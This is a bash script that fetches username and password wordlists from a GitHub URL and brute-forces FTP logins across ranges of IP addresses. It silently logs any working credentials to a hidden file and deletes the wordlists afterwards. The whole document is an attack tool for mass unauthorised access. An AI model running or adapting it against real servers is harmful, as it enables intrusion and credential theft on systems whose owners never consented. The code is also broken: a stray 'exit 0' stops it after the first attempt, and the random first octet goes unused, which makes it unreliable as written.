#!/bin/bash

function force {
	userdict="./.u$2"
	passdict="./.p$2"
	echo "directories: $userdict $passdict"
	for user in `cat $userdict`; do
		for pass in `cat $passdict`; do
			result=$(ftp -in "$1" <<-EOF
				user "$user" "$pass"
				quit
				EOF
				)
			exit 0
			if [ "$result" = "Not connected." ]; then
				return 0
			elif [ "$result" != "Login incorrect." ]; then
				echo "${1}, user: ${user}, pass: $pass" >> ./.forced
				return 1
			fi
		done
	done
}

randomname=$RANDOM
curl -s https://raw.githubusercontent.com/ArchieSin314/TestSite/main/userdict > ./.u$randomname
curl -s https://raw.githubusercontent.com/ArchieSin314/TestSite/main/passdict > ./.p$randomname

r=$(($RANDOM%249)) #1st octet
if [ $r -ne 127 ]; then
	for i in $(seq 0 255); do #2nd octet
		for j in $(seq 0 255); do #3rd octet
			if [ $r -eq 192 ]; then
				force $(echo "192.168.${i}.${j}") $randomname
			else
        			for k in $(seq 1 255); do #4th octet
        				force $(echo "192.${i}.${j}.${k}") $randomname
				done
			fi
		done
	done
fi

rm ./.u$randomname ./.p$randomname
